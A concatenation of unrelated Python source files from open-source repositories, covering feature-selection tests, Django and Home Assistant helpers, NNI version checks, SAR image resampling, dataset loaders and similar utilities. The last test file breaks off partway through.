class Player(Model):
name: str
level: int = 1
document = {"name": "Leeroy", "_id": ObjectId("5f8352a87a733b8b18b0cb27")}
user = Player.parse_doc(document)
print(repr(user))
#> Player(
#> id=ObjectId("5f8352a87a733b8b18b0cb27"),
#> name="Leeroy",
#> level=1,
#> )
|
core/tests/unittests/test_feature_selection.py
|
zhiqiangdon/autogluon
| 4,462 |
103078
|
from autogluon.core.utils.feature_selection import *
from autogluon.core.utils.utils import unevaluated_fi_df_template
import numpy as np
from numpy.core.fromnumeric import sort
import pandas as pd
import pytest
def evaluated_fi_df_template(features, importance=None, n=None):
rng = np.random.default_rng(0)
importance_df = pd.DataFrame({'name': features})
importance_df['importance'] = rng.standard_normal(len(features)) if importance is None else importance
importance_df['stddev'] = rng.standard_normal(len(features))
importance_df['p_value'] = None
importance_df['n'] = 5 if n is None else n
importance_df.set_index('name', inplace=True)
importance_df.index.name = None
return importance_df
@pytest.fixture
def sample_features():
return ['a', 'b', 'c', 'd', 'e']
@pytest.fixture
def sample_importance_df_1(sample_features):
return evaluated_fi_df_template(sample_features, importance=[0.2, 0.2, None, 1., None], n=[10, 5, 0, 5, 0])
@pytest.fixture
def sample_importance_df_2(sample_features):
return evaluated_fi_df_template(sample_features, importance=[-0.1, -0.1, 0.1, None, None], n=[5, 10, 10, 0, 0])
def test_add_noise_column_df():
# test that noise columns are appended to the input dataframe
X = pd.DataFrame({'a': [1, 2]})
args = {'rng': np.random.default_rng(0), 'count': 2}
X_noised, noise_columns = add_noise_column(X, **args)
expected_features = X.columns.tolist() + noise_columns
assert expected_features == X_noised.columns.tolist()
def test_merge_importance_dfs_base(sample_features):
# test the scenario when previous feature importance df is none
prev_df, curr_df = None, unevaluated_fi_df_template(sample_features)
assert merge_importance_dfs(prev_df, curr_df, using_prev_fit_fi=set()) is curr_df
def test_merge_importance_dfs_same_model(sample_features, sample_importance_df_1, sample_importance_df_2):
# test the scenario where previous feature importance df exists and its importance estimates come from the same fitted model
prev_df, curr_df = sample_importance_df_1, sample_importance_df_2
result_df = merge_importance_dfs(prev_df, curr_df, using_prev_fit_fi=set())
assert [score if score == score else None for score in result_df['importance'].tolist()] == [0., 0.1, 0.1, 1., None]
assert result_df['n'].tolist() == [15, 15, 10, 5, 0]
def test_merge_importance_dfs_different_model(sample_features, sample_importance_df_1, sample_importance_df_2):
# test the scenario where previous feature importance df exists and its importance estimates come from a different fitted model
prev_df, curr_df = sample_importance_df_1, sample_importance_df_2
using_prev_fit_fi = set(sample_features)
result_df = merge_importance_dfs(prev_df, curr_df, using_prev_fit_fi=using_prev_fit_fi).sort_index()
assert len(using_prev_fit_fi) == 2
assert [score if score == score else None for score in result_df['importance'].tolist()] == [-0.1, -0.1, 0.1, 1., None]
assert result_df['n'].tolist() == [5, 10, 10, 5, 0]
def test_merge_importance_dfs_all(sample_features, sample_importance_df_1, sample_importance_df_2):
# test the scenario where previous feature importance df exists and its importance estimates come from both same and different fitted models
prev_df, curr_df = sample_importance_df_1, sample_importance_df_2
using_prev_fit_fi = set([sample_features[0]])
result_df = merge_importance_dfs(prev_df, curr_df, using_prev_fit_fi=using_prev_fit_fi).sort_index()
assert [score if score == score else None for score in result_df['importance'].tolist()] == [-0.1, 0., 0.1, 1., None]
assert result_df['n'].tolist() == [5, 15, 10, 5, 0]
assert using_prev_fit_fi == set()
def test_sort_features_by_priority_base(sample_features):
# test the ordering of feature importance computation when no prior feature importance computation was done
sorted_features = sort_features_by_priority(features=sample_features, prev_importance_df=None, using_prev_fit_fi=set())
assert sorted_features == sample_features
def test_sort_features_by_priority_same_model(sample_features):
# test the ordering of feature importance computation when prior feature importance computation from the same fitted model was done
prev_importance_df = evaluated_fi_df_template(sample_features)
sorted_features = sort_features_by_priority(features=sample_features, prev_importance_df=prev_importance_df, using_prev_fit_fi=set())
assert sorted_features == prev_importance_df.sort_values('importance').index.tolist()
def test_sort_features_by_priority_different_model(sample_features):
# test the ordering of feature importance computation when prior feature importance computation from a different fitted model was done
prev_importance_df = evaluated_fi_df_template(sample_features)
using_prev_fit_fi = sample_features[-2:]
sorted_features = sort_features_by_priority(features=sample_features, prev_importance_df=prev_importance_df, using_prev_fit_fi=using_prev_fit_fi)
sorted_prev_fit_features = prev_importance_df[prev_importance_df.index.isin(using_prev_fit_fi)].sort_values('importance').index.tolist()
sorted_curr_fit_features = prev_importance_df[~prev_importance_df.index.isin(using_prev_fit_fi)].sort_values('importance').index.tolist()
expected_features = sorted_prev_fit_features + sorted_curr_fit_features
assert sorted_features == expected_features
def test_sort_features_by_priority_all(sample_features):
# test the ordering of feature importance computation when feature importance estimates come from a mix of current and previous fit models,
# and some features are unevaluated
length = len(sample_features)
using_prev_fit_fi = set(sample_features[:length//3])
evaluated_rows, unevaluated_rows = evaluated_fi_df_template(sample_features[:length//2]), unevaluated_fi_df_template(sample_features[length//2:])
prev_importance_df = pd.concat([evaluated_rows, unevaluated_rows])
sorted_features = sort_features_by_priority(features=sample_features, prev_importance_df=prev_importance_df, using_prev_fit_fi=using_prev_fit_fi)
unevaluated_features = unevaluated_rows.index.tolist()
sorted_prev_fit_features = evaluated_rows[(~evaluated_rows.index.isin(sample_features[length//2:]))
& (evaluated_rows.index.isin(using_prev_fit_fi))].sort_values('importance').index.tolist()
sorted_curr_fit_features = evaluated_rows[(~evaluated_rows.index.isin(sample_features[length//2:]))
& (~evaluated_rows.index.isin(using_prev_fit_fi))].sort_values('importance').index.tolist()
expected_features = unevaluated_features + sorted_prev_fit_features + sorted_curr_fit_features
assert sorted_features == expected_features
|
_compact.py
|
egemen61/excell
| 253 |
103084
|
try:
from django.http import JsonResponse
except ImportError:
from django.http import HttpResponse
import json
def JsonResponse(data):
return HttpResponse(json.dumps(data),
content_type="application/json")
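# --- Usage sketch (not part of the original module) ---
# Either branch above exposes the same call shape to the rest of the package;
# the import path and view below are hypothetical.
# from ._compact import JsonResponse
# def ajax_view(request):
#     return JsonResponse({"ok": True})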
|
custom_components/audiconnect/const.py
|
andersop91/audi_connect_ha
| 103 |
103094
|
DOMAIN = "audiconnect"
CONF_VIN = "vin"
CONF_CARNAME = "carname"
CONF_ACTION = "action"
MIN_UPDATE_INTERVAL = 5
DEFAULT_UPDATE_INTERVAL = 10
CONF_SPIN = "spin"
CONF_REGION = "region"
CONF_SERVICE_URL = "service_url"
CONF_MUTABLE = "mutable"
SIGNAL_STATE_UPDATED = "{}.updated".format(DOMAIN)
TRACKER_UPDATE = f"{DOMAIN}_tracker_update"
RESOURCES = [
"position",
"last_update_time",
"mileage",
"range",
"service_inspection_time",
"service_inspection_distance",
"oil_change_time",
"oil_change_distance",
"oil_level",
"charging_state",
"max_charge_current",
"engine_type1",
"engine_type2",
"parking_light",
"any_window_open",
"any_door_unlocked",
"any_door_open",
"trunk_unlocked",
"trunk_open",
"hood_open",
"tank_level",
"state_of_charge",
"remaining_charging_time",
"plug_state",
"sun_roof",
"doors_trunk_status",
]
COMPONENTS = {
"sensor": "sensor",
"binary_sensor": "binary_sensor",
"lock": "lock",
"device_tracker": "device_tracker",
"switch": "switch",
}
|
Packs/Campaign/Scripts/SendEmailToCampaignRecipients/SendEmailToCampaignRecipients_test.py
|
SergeBakharev/content
| 799 |
103127
|
import pytest
from SendEmailToCampaignRecipients import *
CAMPAIGN_EMAIL_TO = 'campaignemailto'
CAMPAIGN_EMAIL_SUBJECT = 'campaignemailsubject'
CAMPAIGN_EMAIL_BODY = 'campaignemailbody'
NUM_OF_INCIDENTS = 5
INCIDENT_IDS = [str(i) for i in range(NUM_OF_INCIDENTS)]
CUSTOM_FIELDS = {
CAMPAIGN_EMAIL_TO: '<EMAIL>',
CAMPAIGN_EMAIL_SUBJECT: 'Campaign Detected',
CAMPAIGN_EMAIL_BODY: 'Please check the email'
}
MOCKED_INCIDENT = {
'id': 100,
'CustomFields': CUSTOM_FIELDS
}
def test_send_email_happy_path(mocker):
"""
Given -
Mocked custom field for an incident
When -
Run the main function of the command
Then -
Validate the expected args sent to demisto.executeCommand
"""
# prepare
mocker.patch.object(demisto, 'incidents', return_value=[MOCKED_INCIDENT])
mocker.patch.object(demisto, 'executeCommand')
# run
main()
# validate
assert demisto.executeCommand.call_args[0][0] == 'send-mail'
command_arg_dict = demisto.executeCommand.call_args[0][1]
for custom_field_key, command_key in zip(CUSTOM_FIELDS.keys(), ['to', 'subject', 'body']):
assert command_arg_dict[command_key] == CUSTOM_FIELDS[custom_field_key]
def test_no_email_to(mocker):
"""
Given -
Empty emailto in the incident
When -
Try to send email
Then -
Validate return_error was called
"""
# prepare
mocker.patch.object(demisto, 'incidents', return_value=[MOCKED_INCIDENT])
mocker.patch.object(demisto, 'results')
CUSTOM_FIELDS[CAMPAIGN_EMAIL_TO] = ''
# run
try:
main()
pytest.fail('SystemExit should have occurred because return_error was called')
except SystemExit:
args = demisto.results.call_args[0][0]
assert args['Contents'] == INVALID_EMAIL_TO_MSG
|
nni/common/version.py
|
Microsoft/nni
| 2,305 |
103143
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from __future__ import annotations
import logging
import sys
import warnings
import cloudpickle
import json_tricks
import numpy
import yaml
import nni
def _minor_version_tuple(version_str: str) -> tuple[int, int]:
# If not a number, returns -1 (e.g., 999.dev0 -> (999, -1))
return tuple(int(x) if x.isdigit() else -1 for x in version_str.split(".")[:2])
PYTHON_VERSION = sys.version_info[:2]
NUMPY_VERSION = _minor_version_tuple(numpy.__version__)
try:
import torch
TORCH_VERSION = _minor_version_tuple(torch.__version__)
except ImportError:
logging.getLogger(__name__).info("PyTorch is not installed.")
TORCH_VERSION = None
try:
import pytorch_lightning
PYTORCH_LIGHTNING_VERSION = _minor_version_tuple(pytorch_lightning.__version__)
except ImportError:
logging.getLogger(__name__).info("PyTorch Lightning is not installed.")
PYTORCH_LIGHTNING_VERSION = None
try:
import tensorflow
TENSORFLOW_VERSION = _minor_version_tuple(tensorflow.__version__)
except ImportError:
logging.getLogger(__name__).info("Tensorflow is not installed.")
TENSORFLOW_VERSION = None
# Serialization version checks are needed because these packages are prone to be inconsistent across versions
CLOUDPICKLE_VERSION = _minor_version_tuple(cloudpickle.__version__)
JSON_TRICKS_VERSION = _minor_version_tuple(json_tricks.__version__)
PYYAML_VERSION = _minor_version_tuple(yaml.__version__)
NNI_VERSION = _minor_version_tuple(nni.__version__)
def version_dump() -> dict[str, tuple[int, int] | None]:
return {
'python': PYTHON_VERSION,
'numpy': NUMPY_VERSION,
'torch': TORCH_VERSION,
'pytorch_lightning': PYTORCH_LIGHTNING_VERSION,
'tensorflow': TENSORFLOW_VERSION,
'cloudpickle': CLOUDPICKLE_VERSION,
'json_tricks': JSON_TRICKS_VERSION,
'pyyaml': PYYAML_VERSION,
'nni': NNI_VERSION
}
def version_check(expect: dict, raise_error: bool = False) -> None:
current_ver = version_dump()
for package in expect:
# version could be list due to serialization
exp_version: tuple | None = tuple(expect[package]) if expect[package] else None
if exp_version is None:
continue
err_message: str | None = None
if package not in current_ver:
err_message = f'{package} is missing in current environment'
elif current_ver[package] != exp_version:
err_message = f'Expect {package} to have version {exp_version}, but {current_ver[package]} found'
if err_message:
if raise_error:
raise RuntimeError('Version check failed: ' + err_message)
else:
warnings.warn('Version check with warning: ' + err_message)
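# --- Usage sketch (not part of the original file) ---
# A dumped snapshot can be checked later, e.g. when a serialized experiment
# is reloaded on another machine; the mismatched numpy version is made up.
if __name__ == '__main__':
    snapshot = version_dump()
    version_check(snapshot)            # same environment: silent
    version_check({'numpy': (1, 0)})   # mismatch: emits a warning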
|
app/lib/models/webpush.py
|
didi9575/crackerjack
| 237 |
103158
|
from app import db
class WebPushSubscriptionModel(db.Model):
__tablename__ = 'webpush_subscriptions'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, default=0, index=True, nullable=True)
endpoint = db.Column(db.String, default='', index=False, nullable=True)
key = db.Column(db.String, default='', index=False, nullable=True)
authsecret = db.Column(db.String, default='', index=False, nullable=True)
finished_at = db.Column(db.DateTime, nullable=True)
class WebPushLogModel(db.Model):
__tablename__ = 'webpush_logs'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, default=0, index=True, nullable=True)
data = db.Column(db.Text, nullable=True)
sent_at = db.Column(db.DateTime, nullable=True)
|
src/condor_tools/htcondor_cli/verb.py
|
datadvance/htcondor
| 217 |
103169
|
from abc import ABC, abstractmethod
class Verb(ABC):
"""
This docstring is used in the help message when doing
`htcondor noun verb --help`
"""
# The options class dict is a nested dict containing kwargs
# per option for the add_argument method of ArgumentParser,
# see COMMON_OPTIONS in __init__.py for an example.
options = {}
# The __init__ method should take the Verb's options
# and execute whatever it is the user expects to happen.
# The first arg should always be logger.
@abstractmethod
def __init__(self, logger, *args, **kwargs):
raise NotImplementedError
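# --- Illustrative subclass (not part of the original module) ---
# A hypothetical verb showing how the `options` dict and the `__init__`
# contract described above fit together; the option spec simply mirrors
# kwargs accepted by ArgumentParser.add_argument.
class ExampleStatus(Verb):
    """
    Show the status of a resource (hypothetical example).
    """

    options = {
        "resource_id": {
            "args": ("resource_id",),
            "help": "ID of the resource to inspect",
        },
    }

    def __init__(self, logger, resource_id, **options):
        logger.info(f"Looking up status of {resource_id}")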
|
dukpy/webassets/jsxfilter.py
|
Dhandarah/dukpy
| 363 |
103230
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
import os
from webassets.filter import Filter
import dukpy
__all__ = ('BabelJSX', )
class BabelJSX(Filter):
name = 'babeljsx'
max_debug_level = None
options = {
'loader': 'BABEL_MODULES_LOADER'
}
def input(self, _in, out, **kw):
options = {'filename': os.path.basename(kw['source_path'])}
if self.loader == 'systemjs':
options['plugins'] = ['transform-es2015-modules-systemjs']
elif self.loader == 'umd':
options['plugins'] = ['transform-es2015-modules-umd']
src = dukpy.jsx_compile(_in.read(), **options)
out.write(src)
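# --- Usage sketch (not part of the original module) ---
# Registering the filter with a webassets Environment; the directories,
# bundle names and loader value are placeholders.
if __name__ == '__main__':
    from webassets import Bundle, Environment
    from webassets.filter import register_filter
    register_filter(BabelJSX)
    env = Environment('./static', '/static')
    env.config['BABEL_MODULES_LOADER'] = 'umd'
    js = Bundle('app.jsx', filters='babeljsx', output='gen/app.js')
    env.register('app_js', js)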
|
code/gen_item_blend_sim.py
|
aister2020/KDDCUP_2020_Debiasing_1st_Place
| 159 |
103235
|
# -*- coding: utf-8 -*-
import numpy as np
from constants import *
import utils
import gc
item_feat = utils.load_pickle(item_feat_pkl)
feat_item_set = set(item_feat.keys())
item_vec1= np.zeros((120000,128),dtype='float32')
item_vec2= np.zeros((120000,128),dtype='float32')
for k,v in item_feat.items():
item_vec1[k] = v[0]
item_vec2[k] = v[1]
split_size = 1000
split_num = int(item_vec1.shape[0]/split_size)
if item_vec1.shape[0]%split_size != 0:
split_num += 1
all_idx = []
all_score = []
l2norm1 = np.linalg.norm(item_vec1,axis=1,keepdims=True)
item_vec1 = item_vec1/(l2norm1+1e-9)
l2norm2 = np.linalg.norm(item_vec2,axis=1,keepdims=True)
item_vec2 = item_vec2/(l2norm2+1e-9)
vec1_vec2 = np.transpose(item_vec1)
vec2_vec2 = np.transpose(item_vec2)
for i in range(split_num):
vec1_vec1 = item_vec1[i*split_size:(i+1)*split_size]
vec2_vec1 = item_vec2[i*split_size:(i+1)*split_size]
text_sim = vec1_vec1.dot(vec1_vec2)
image_sim = vec2_vec1.dot(vec2_vec2)
blend_sim = 0.95*text_sim + 0.05*image_sim
idx = (-blend_sim).argsort(axis=1)
blend_sim = (-blend_sim)
blend_sim.sort(axis=1)
idx = idx[:,:500]
score = blend_sim[:,:500]
score = -score
all_idx.append(idx)
all_score.append(score)
gc.collect()
print('split_num',i)
idx = np.concatenate(all_idx)
score = np.concatenate(all_score)
sim = []
for i in range(idx.shape[0]):
if i in feat_item_set:
sim_i = []
for j,item in enumerate(idx[i]):
if item in feat_item_set:
sim_i.append((item,score[i][j]))
sim.append((i,sim_i))
utils.write_sim(sim,item_blend_sim_path)
|
components/stdproc/stdproc/resamp_slc/Resamp_slc.py
|
vincentschut/isce2
| 1,133 |
103313
|
#!/usr/bin/env python3
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2010 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Author: <NAME>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import sys
import os
import math
import numpy as np
import logging
from iscesys.Component.Component import Component,Port
from stdproc.stdproc.resamp_slc import resamp_slc
from isceobj.Util import combinedlibmodule as CL
import isceobj
from iscesys.ImageUtil.ImageUtil import ImageUtil as IU
from isceobj.Util import Poly2D
class Resamp_slc(Component):
interpolationMethods = { 'SINC' : 0,
'BILINEAR' : 1,
'BICUBIC' : 2,
'NEAREST' : 3,
'AKIMA' : 4,
'BIQUINTIC': 5}
def resamp_slc(self, imageIn=None, imageOut=None):
for port in self.inputPorts:
port()
if imageIn is not None:
self.imageIn = imageIn
if self.imageIn is None:
self.logger.error("Input slc image not set.")
raise Exception
if imageOut is not None:
self.imageOut = imageOut
if self.imageOut is None:
self.logger.error("Output slc image not set.")
raise Exception
self.setDefaults()
self.createImages()
self.setState()
resamp_slc.setRangeCarrier_Py(self.rangeCarrierAccessor)
resamp_slc.setAzimuthCarrier_Py(self.azimuthCarrierAccessor)
resamp_slc.setRangeOffsetsPoly_Py(self.rangeOffsetsAccessor)
resamp_slc.setAzimuthOffsetsPoly_Py(self.azimuthOffsetsAccessor)
resamp_slc.setDopplerPoly_Py(self.dopplerAccessor)
resamp_slc.resamp_slc_Py(self.imageInAccessor,self.imageOutAccessor,self.residualAzimuthAccessor, self.residualRangeAccessor)
self.destroyImages()
return
def createImages(self):
if self.imageIn._accessor is None:
self.imageIn.createImage()
self.imageInAccessor = self.imageIn.getImagePointer()
if self.imageOut._accessor is None:
self.imageOut.createImage()
self.imageOutAccessor = self.imageOut.getImagePointer()
if self.rangeCarrierPoly is not None:
self.rangeCarrierAccessor = self.rangeCarrierPoly.exportToC()
else:
print('No Range Carrier provided.')
print('Assuming zero range carrier.')
poly = Poly2D.Poly2D()
poly.initPoly(rangeOrder=0, azimuthOrder=0, coeffs=[[0.]])
self.rangeCarrierAccessor = poly.exportToC()
if self.azimuthCarrierPoly is not None:
self.azimuthCarrierAccessor = self.azimuthCarrierPoly.exportToC()
else:
poly = Poly2D.Poly2D()
poly.initPoly(rangeOrder=0, azimuthOrder=0, coeffs=[[0.]])
self.azimuthCarrierAccessor = poly.exportToC()
print('No Azimuth Carrier provided.')
print('Assuming zero azimuth carrier.')
if self.rangeOffsetsPoly is not None:
self.rangeOffsetsAccessor = self.rangeOffsetsPoly.exportToC()
else:
print('No range offset polynomial provided')
poly = Poly2D.Poly2D()
poly.initPoly(rangeOrder=0, azimuthOrder=0, coeffs=[[0.]])
self.rangeOffsetsAccessor = poly.exportToC()
if self.azimuthOffsetsPoly is not None:
self.azimuthOffsetsAccessor = self.azimuthOffsetsPoly.exportToC()
else:
print('No azimuth offset polynomial provided')
poly = Poly2D.Poly2D()
poly.initPoly(rangeOrder=0, azimuthOrder=0, coeffs = [[0.]])
self.azimuthOffsetsAccessor = poly.exportToC()
if self.residualRangeImage is not None:
if self.residualRangeImage._accessor is None:
self.residualRangeImage.setCaster('read', 'DOUBLE')
self.residualRangeImage.createImage()
self.residualRangeAccessor = self.residualRangeImage.getImagePointer()
else:
self.residualRangeAccessor = 0
if self.residualAzimuthImage is not None:
if self.residualAzimuthImage._accessor is None:
self.residualAzimuthImage.setCaster('read', 'DOUBLE')
self.residualAzimuthImage.createImage()
self.residualAzimuthAccessor = self.residualAzimuthImage.getImagePointer()
else:
self.residualAzimuthAccessor = 0
if self.dopplerPoly is not None:
self.dopplerAccessor = self.dopplerPoly.exportToC()
else:
print('No doppler polynomial provided')
print('Assuming zero doppler centroid')
poly = Poly2D.Poly2D()
poly.initPoly(rangeOrder=0, azimuthOrder=0, coeffs=[[0.]])
self.dopplerAccessor = poly.exportToC()
def destroyImages(self):
CL.freeCPoly2D(self.rangeCarrierAccessor)
CL.freeCPoly2D(self.azimuthCarrierAccessor)
CL.freeCPoly2D(self.rangeOffsetsAccessor)
CL.freeCPoly2D(self.azimuthOffsetsAccessor)
CL.freeCPoly2D(self.dopplerAccessor)
if self.residualRangeImage is not None:
self.residualRangeImage.finalizeImage()
if self.residualAzimuthImage is not None:
self.residualAzimuthImage.finalizeImage()
self.imageIn.finalizeImage()
self.imageOut.finalizeImage()
return
def setDefaults(self):
if self.inputLines is None:
self.inputLines = self.imageIn.getLength()
self.logger.warning('The variable INPUT_LINES has been set to the default value %d which is the number of lines in the slc image.' % (self.inputLines))
if self.inputWidth is None:
self.inputWidth = self.imageIn.getWidth()
self.logger.warning('The variable INPUT_WIDTH has been set to the default value %d which is the width of the slc image.' % (self.inputWidth))
if self.inputWidth != self.imageIn.getWidth():
raise Exception('Width of input image {0} does not match specified width {1}'.format(self.imageIn.getWidth(), self.inputWidth))
if self.startingRange is None:
self.startingRange = 0.0
if self.referenceStartingRange is None:
self.referenceStartingRange = self.startingRange
if self.referenceSlantRangePixelSpacing is None:
self.referenceSlantRangePixelSpacing = self.slantRangePixelSpacing
if self.referenceWavelength is None:
self.referenceWavelength = self.radarWavelength
if self.outputLines is None:
self.outputLines = self.imageOut.getLength()
self.logger.warning('The variable OUTPUT_LINES has been set to the default value %d which is the number of lines in the slc image.'%(self.outputLines))
if self.outputWidth is None:
self.outputWidth = self.imageOut.getWidth()
self.logger.warning('The variable OUTPUT_WIDTH has been set to the default value %d which is the width of the slc image.'%(self.outputWidth))
if (self.outputWidth != self.imageOut.getWidth()):
raise Exception('Width of output image {0} does not match specified width {1}'.format(self.imageOut.getWidth(), self.outputWidth))
if self.imageIn.dataType.upper().startswith('C'):
self.isComplex = True
else:
self.isComplex = False
if self.imageIn.getBands() > 1:
raise Exception('The code currently is setup to resample single band images only')
if self.method is None:
if self.isComplex:
self.method = 'SINC'
else:
self.method = 'BILINEAR'
if self.flatten is None:
self.logger.warning('No flattening requested')
self.flatten = False
return
def setState(self):
resamp_slc.setInputWidth_Py(int(self.inputWidth))
resamp_slc.setInputLines_Py(int(self.inputLines))
resamp_slc.setOutputWidth_Py(int(self.outputWidth))
resamp_slc.setOutputLines_Py(int(self.outputLines))
resamp_slc.setRadarWavelength_Py(float(self.radarWavelength))
resamp_slc.setSlantRangePixelSpacing_Py(float(self.slantRangePixelSpacing))
###Introduced for dealing with data with different range sampling frequencies
resamp_slc.setReferenceWavelength_Py(float(self.referenceWavelength))
resamp_slc.setStartingRange_Py(float(self.startingRange))
resamp_slc.setReferenceStartingRange_Py(float(self.referenceStartingRange))
resamp_slc.setReferenceSlantRangePixelSpacing_Py(float(self.referenceSlantRangePixelSpacing))
intpKey = self.interpolationMethods[self.method.upper()]
resamp_slc.setMethod_Py(int(intpKey))
resamp_slc.setIsComplex_Py(int(self.isComplex))
resamp_slc.setFlatten_Py(int(self.flatten))
return
def setInputWidth(self,var):
self.inputWidth = int(var)
return
def setInputLines(self, var):
self.inputLines = int(var)
return
def setOutputWidth(self, var):
self.outputWidth = int(var)
return
def setOutputLines(self,var):
self.outputLines = int(var)
return
def setRadarWavelength(self,var):
self.radarWavelength = float(var)
return
def setSlantRangePixelSpacing(self,var):
self.slantRangePixelSpacing = float(var)
return
def __getstate__(self):
d = dict(self.__dict__)
del d['logger']
return d
def __setstate__(self,d):
self.__dict__.update(d)
self.logger = logging.getLogger('isce.stdproc.resamp_slc')
return
def addOffsets(self):
from isceobj.Util.Poly2D import Poly2D
offsets = self._inputPorts['offsets']
if offsets:
polys = offsets.getFitPolynomials()
self.azimuthOffsetsPoly = polys[0]
self.rangeOffsetsPoly = polys[1]
def addSlc(self):
from isceobj.Util import Poly2D
from isceobj.Constants import SPEED_OF_LIGHT
formslc = self._inputPorts['slc']
if (formslc):
####Set up azimuth carrier information
coeffs = []
coeffs.append([2*np.pi*val for val in formslc.dopplerCentroidCoefficients])
self.dopplerPoly = Poly2D.Poly2D()
self.dopplerPoly.initPoly(rangeOrder=len(formslc.dopplerCentroidCoefficients)-1, azimuthOrder=0, coeffs=coeffs)
######Setup range carrier information
delr = 0.5*SPEED_OF_LIGHT / formslc.rangeSamplingRate
self.slantRangePixelSpacing = delr
self.radarWavelength = formslc.radarWavelength
# coeffs = [[0.0, -4 * np.pi * delr/self.radarWavelength]]
# self.rangeCarrierPoly = Poly2D.Poly2D()
# self.rangeCarrierPoly.initPoly(rangeOrder=1, azimuthOrder=0, coeffs=coeffs)
img = isceobj.createImage()
IU.copyAttributes(formslc.slcImage, img)
img.setAccessMode('read')
self.imageIn = img
def addReferenceImage(self):
refImg = self._inputPorts['reference']
if (refImg):
self.outputWidth = refImg.getWidth()
self.outputLines = refImg.getLength()
def __init__(self):
Component.__init__(self)
self.inputWidth = None
self.inputLines = None
self.outputWidth = None
self.outputLines = None
self.radarWavelength = None
self.slantRangePixelSpacing = None
self.azimuthOffsetsPoly = None
self.azimuthOffsetsAccessor = None
self.rangeOffsetsPoly = None
self.rangeOffsetsAccessor = None
self.rangeCarrierPoly = None
self.rangeCarrierAccessor = None
self.azimuthCarrierPoly = None
self.azimuthCarrierAccessor = None
self.residualRangeImage = None
self.residualAzimuthImage = None
self.residualRangeAccessor = None
self.residualAzimuthAccessor = None
self.dopplerPoly = None
self.dopplerAccessor = None
self.isComplex = None
self.method = None
self.flatten = None
self.startingRange = None
self.referenceWavelength = None
self.referenceStartingRange = None
self.referenceSlantRangePixelSpacing = None
self.logger = logging.getLogger('isce.stdproc.resamp_slc')
offsetPort = Port(name='offsets', method=self.addOffsets)
slcPort = Port(name='slc', method=self.addSlc)
referencePort = Port(name='reference', method=self.addReferenceImage)
self._inputPorts.add(offsetPort)
self._inputPorts.add(slcPort)
self._inputPorts.add(referencePort)
self.dictionaryOfVariables = { \
'INPUT_WIDTH' : ['self.inputWidth', 'int','mandatory'], \
'INPUT_LINES' : ['self.inputLines', 'int','optional'], \
'OUTPUT_LINES' : ['self.outputLines', 'int', 'optional'], \
'OUTPUT_WIDTH' : ['self.outputWidth', 'int', 'optional'], \
'RADAR_WAVELENGTH' : ['self.radarWavelength', 'float','mandatory'], \
'SLANT_RANGE_PIXEL_SPACING' : ['self.slantRangePixelSpacing', 'float','mandatory'], \
}
self.dictionaryOfOutputVariables = { }
return
#end class
if __name__ == "__main__":
sys.exit(main())
|
universal_computation/datasets/listops.py
|
jasonjewik/universal-computation
| 183 |
103343
|
import tensorflow_datasets
import torch
from universal_computation.datasets.dataset import Dataset
from universal_computation.datasets.helpers.listops import get_datasets
class ListopsDataset(Dataset):
def __init__(self, batch_size, *args, **kwargs):
super().__init__(*args, **kwargs)
self.batch_size = batch_size # we fix it so we can use dataloader
self.d_train, self.d_test, *_ = get_datasets(1, 'basic', batch_size=batch_size, data_dir='data/listops/')
self.train_enum = iter(tensorflow_datasets.as_numpy(self.d_train))
self.test_enum = iter(tensorflow_datasets.as_numpy(self.d_test))
def reset_test(self):
self.test_enum = iter(tensorflow_datasets.as_numpy(self.d_test))  # match get_batch, which expects raw numpy batches rather than (index, batch) pairs
def get_batch(self, batch_size=None, train=True):
if train:
batch = next(self.train_enum, None)
if batch is None:
self.train_enum = iter(tensorflow_datasets.as_numpy(self.d_train))
batch = next(self.train_enum)
else:
batch = next(self.test_enum, None)
if batch is None:
self.test_enum = iter(tensorflow_datasets.as_numpy(self.d_test))
batch = next(self.test_enum)
x, y = batch['inputs'], batch['targets']
x = torch.from_numpy(x).long()
y = torch.from_numpy(y).long()
x = x.to(device=self.device)
y = y.to(device=self.device)
self._ind += 1
return x, y
|
simulation/decai/simulation/data/featuremapping/tests/test_feature_index_mapper.py
|
boost-entropy-python/0xDeCA10B
| 445 |
103385
|
import unittest
import numpy as np
import scipy.sparse
from injector import Injector
from decai.simulation.data.featuremapping.feature_index_mapper import FeatureIndexMapper
from decai.simulation.logging_module import LoggingModule
class TestFeatureIndexMapper(unittest.TestCase):
@classmethod
def setUpClass(cls):
inj = Injector([
LoggingModule,
])
cls.f = inj.get(FeatureIndexMapper)
def test_map_dense(self):
x_train = np.random.random_sample((10, 3))
x_test = np.random.random_sample((4, x_train.shape[1]))
train, test, feature_index_mapping = self.f.map(x_train, x_test)
self.assertIs(train, x_train)
self.assertIs(test, x_test)
self.assertIsNone(feature_index_mapping)
def test_map_sparse(self):
x_train = np.array([[0, 0, 1, 1, 0], [0, 2, 0, 0, 0]])
x_test = np.array([[1, 0, 1, 0, 1], [0, 0, 3, 0, 0]])
x_train_sparse = scipy.sparse.csr_matrix((17348, 4288315073), dtype=np.uint8)
x_train_sparse[x_train.nonzero()] = x_train[x_train.nonzero()]
x_test_sparse = scipy.sparse.csr_matrix((3333, 21312344), dtype=np.uint8)
